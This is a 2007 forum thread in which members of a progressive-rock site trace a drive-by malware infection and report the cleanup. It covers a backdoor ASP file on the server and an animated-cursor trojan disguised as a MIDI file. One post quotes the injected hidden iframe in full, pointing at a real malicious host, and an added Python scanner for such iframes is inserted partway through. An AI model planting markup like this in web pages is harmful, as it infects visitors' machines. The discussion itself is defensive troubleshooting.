Virus on front page |
Sean Trane
Special Collaborator Prog Folk Joined: April 29 2004 Location: Heart of Europe Status: Offline Points: 20250 |
Topic: Virus on front page Posted: June 13 2007 at 04:28 |
|
I just had the thing popping up again this morning on the last page on the upper right side (with the new additions)
|
||
let's just stay above the moral melee
prefer the sink to the gutter keep our sand-castle virtues content to be a doer as well as a thinker, prefer lifting our pen rather than un-sheath our sword |
||
JayDee
Forum Senior Member VIP Member Joined: September 07 2005 Location: Elysian Fields Status: Offline Points: 10063 |
Posted: June 10 2007 at 00:49 | |
No pop ups now. I think the problem is already fixed. Thanks guys!
|
||
|
||
Atkingani
Special Collaborator Honorary Collaborator / Retired Admin Joined: October 21 2005 Location: Terra Brasilis Status: Offline Points: 12288 |
Posted: June 08 2007 at 12:15 | |
Graphix informed the following:
1) The virus scan found 1 virus on PA server that is an ASP file used as an IIS Back door that could access files and database on the server. It could be the reason why:
2) 2 rows in the database were infected. The florida-rentals-direct.com iframe HTML code was inserted in the description of 2 forum topics, Books and misc reviews and Collaborators discussions (Not Related to Music). Each time one of these forum topics was displayed, the unwanted iframe HTML hacked code was also displayed... I removed the code from the database.
If you find anything else, let me know. Your help is really appreciated, thanks again |
||
Guigo
~~~~~~ |
||
avestin
Special Collaborator Honorary Collaborator Joined: September 18 2005 Status: Offline Points: 12625 |
Posted: June 08 2007 at 11:59 | |
I don't get the message anymore. Has this been taken care of (probably) ?
Thanks Dean, for the online technical support!
|
||
Tony R
Special Collaborator Honorary Collaborator / Retired Admin Joined: July 16 2004 Location: UK Status: Offline Points: 11979 |
Posted: June 08 2007 at 08:06 | |
Thanks again Dean
|
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 07:52 | |
Any new page gets loaded into the browser's cache; with IE this is the folder Temporary Internet Files. I use AVG to do a Selected Area Scan of that folder - it's pretty quick that way. For IE it's:
c:\Documents and Settings\<your_user_name>\Local Settings\Temporary Internet Files
I'm afraid I cannot help with other browsers.
|
||
What?
|
||
Tony R
Special Collaborator Honorary Collaborator / Retired Admin Joined: July 16 2004 Location: UK Status: Offline Points: 11979 |
Posted: June 08 2007 at 07:47 | |
You can individual pages?
How? |
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 07:46 | |
As far as I know only Internet Explorer based browsers are vulnerable to the ANI Trojan, but the florida-rentals thing loads both viruses and I do not know whether mozilla-based browsers (ie Firefox) are immune to the other one. Firefox caches temporary internet data in a different way to IE so the virus scan probably won't find it, but it still would have been loaded when the iframe was loaded - I am not qualified to say whether this makes it safer - so I'd play safe and say it is not.
Your anti-virus software will find and kill the virus, but it cannot stop it being loaded onto your PC when you visit affected pages.
I'm getting paranoid at the moment (Master of Reality arrives tomorrow) so I am running the virus checker every time I load a page from PA and PA Forum. I suggest everyone does the same.
|
||
What?
|
||
Tony R
Special Collaborator Honorary Collaborator / Retired Admin Joined: July 16 2004 Location: UK Status: Offline Points: 11979 |
Posted: June 08 2007 at 07:21 | |
Thanks Dean. I am trying to contact Max at this moment.
I've got this virus back today, after clearing it last night. What can I do? I am running AVG anti-virus, I thought I would be protected from things like this. I have now switched back to Firefox. Am I better protected? |
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 07:15 | |
I've found the virus loader on the main Forum page - it does not come in via the Ads, but is buried in the threads list under Other progressive Music Related Discussions:
<td><a href="forum_topics.asp?FID=61">Books and misc reviews</a><br />(new post by admins only)<iframe src="http://www.florida-rentals-direct.com/Realestate_images/app.htm" width="0" height="0" frameborder="0"></iframe></td>
There is probably something similar on the main page too. Rivertree found a similar iframe on the Psyopus band page yesterday - so there could be hundreds of them - to me, it looks like the PA server has been hacked.
|
||
What?
|
||
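Added example, not part of any post in this thread: a Python check an administrator could run over stored forum text fields to find iframes like the one quoted above and described in Graphix's report (zero width and height, off-site `src`). The trusted host, row ids and sample rows are constructed, and the injected host is a placeholder.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: hosts this site legitimately embeds frames from.
TRUSTED_HOSTS = {"www.progarchives.com"}

def _is_zero(value):
    """True for width/height values such as "0" or "0px"."""
    return value.replace("px", "").strip() == "0"

class IframeFinder(HTMLParser):
    """Collects (host, hidden) for every <iframe> start tag in a fragment."""
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {name: (value or "").lower() for name, value in attrs}
        host = urlparse(a.get("src", "")).hostname or ""
        style = a.get("style", "").replace(" ", "")
        hidden = (_is_zero(a.get("width", "")) or _is_zero(a.get("height", ""))
                  or "display:none" in style or "visibility:hidden" in style)
        self.frames.append((host, hidden))

def scan_rows(rows):
    """Return (row_id, host, hidden) for iframes that are off-site or invisible."""
    findings = []
    for row_id, text in rows:
        finder = IframeFinder()
        finder.feed(text or "")
        for host, hidden in finder.frames:
            if hidden or (host and host not in TRUSTED_HOSTS):
                findings.append((row_id, host, hidden))
    return findings

# Constructed rows (id, description); row 61 mimics the quoted markup, placeholder host.
SAMPLE_ROWS = [
    (60, "General music chat<br />(open to all members)"),
    (61, 'Books and misc reviews<br />(new post by admins only)<iframe '
         'src="http://injected.example/images/app.htm" width="0" height="0" '
         'frameborder="0"></iframe>'),
    (62, '<iframe src="http://www.progarchives.com/banner.asp" width="468" '
         'height="60"></iframe>'),
]

if __name__ == "__main__":
    print(scan_rows(SAMPLE_ROWS))
```

Run against every free-text column the forum renders as HTML, not only topic descriptions, since the thread reports the same iframe on more than one page.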
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 06:07 | |
Okay, I've tracked the little fker down some more, which may help you guys get rid of this damn thing.
pay.mid arrives in a file called ani.htm
florida-rental is deployed from a file called app.htm
I haven't found how these two files are attached to the Progarchive main pages yet, my guess is that they are buried in a javascript routine in one of the Ads since pages that do not have adverts are not affected.
PA Admins need to get on top of this because the pay.mid is now deploying Downloader.Small.58.aw - a different virus to the one from yesterday. It won't take long before the bards find one that gets through the virus-scanners.
|
||
What?
|
||
mystic fred
Special Collaborator Honorary Collaborator Joined: March 13 2006 Location: Londinium Status: Offline Points: 4252 |
Posted: June 08 2007 at 05:12 | |
i found this trojan virus - it appeared on my pc at home and two where i work - the McAfee picked it up but couldn't delete or quarantine it. it seemed to be lodged in my temporary internet file which i cleaned out and now it seems to have gone.
|
||
Prog Archives Tour Van
|
||
Sean Trane
Special Collaborator Prog Folk Joined: April 29 2004 Location: Heart of Europe Status: Offline Points: 20250 |
Posted: June 08 2007 at 04:51 | |
Got it too since yesterday morning, but it is also linked to the main forum page.
|
||
let's just stay above the moral melee
prefer the sink to the gutter keep our sand-castle virtues content to be a doer as well as a thinker, prefer lifting our pen rather than un-sheath our sword |
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 08 2007 at 01:03 | |
Looks like these two attacks are related:
but I'm not sure that they are directly related to the Exploit-ANIfile.c trojan (pay.mid).
The Exploit-ANIfile trojan exploits a loop-hole in IE6 & IE7's animated cursor routine. Unfortunately the trojan can be buried in any file that can be placed on a webpage (.jpg, .gif, .mid etc) and if it is really an animated cursor file (.ani) that has been renamed it will be automatically parsed by IE. To prevent this, disable the "open files based on content, not file extension" setting in Tools/Internet Options/Security/Custom Level.
As the virus-checker spots pay.mid as the villain, then it is evident that this midi file is not really a midi file, but a disguised ani file - doing the above should stop that file being treated as a .ani - but it will not stop your virus checker finding it whenever you visit the infected page(s).
|
||
What?
|
||
Rocket_Bob
Forum Groupie Joined: June 05 2007 Status: Offline Points: 48 |
Posted: June 07 2007 at 23:47 | |
|
||
Dean
Special Collaborator Retired Admin and Amateur Layabout Joined: May 13 2007 Location: Europe Status: Offline Points: 37575 |
Posted: June 07 2007 at 23:46 | |
Sorry I'm being remedial - the virus will reappear if the Admin team haven't got rid of it from the home page yet.
If anyone is not running a virus checker, you can download a free one from Grisoft called AVG - it's very good for a freebie.
|
||
What?
|
||
memowakeman
Special Collaborator Honorary Collaborator Joined: May 19 2005 Location: Mexico City Status: Offline Points: 13032 |
Posted: June 07 2007 at 23:11 | |
I'm having this problem too...
|
||
Follow me on twitter @memowakeman |
||
VanderGraafKommandöh
Prog Reviewer Joined: July 04 2005 Location: Malaria Status: Offline Points: 89372 |
Posted: June 07 2007 at 22:30 | |
No problems my end, as I have Adblock + for Firefox (which I thought Tony R had as well?).
I'm glad I don't have it though. I hope you all get it fixed soon. |
||
|
||
JayDee
Forum Senior Member VIP Member Joined: September 07 2005 Location: Elysian Fields Status: Offline Points: 10063 |
Posted: June 07 2007 at 22:19 | |
This is the exact file name:
|
||
|
||
JayDee
Forum Senior Member VIP Member Joined: September 07 2005 Location: Elysian Fields Status: Offline Points: 10063 |
Posted: June 07 2007 at 22:13 | |
I'm experiencing it as well. An automatic download box pops up on my screen. It has the "Florida-rentals" as file name. I ignore it, but every time I return to the forum frontpage, it pops up, it's quite annoying.
|
||
|
||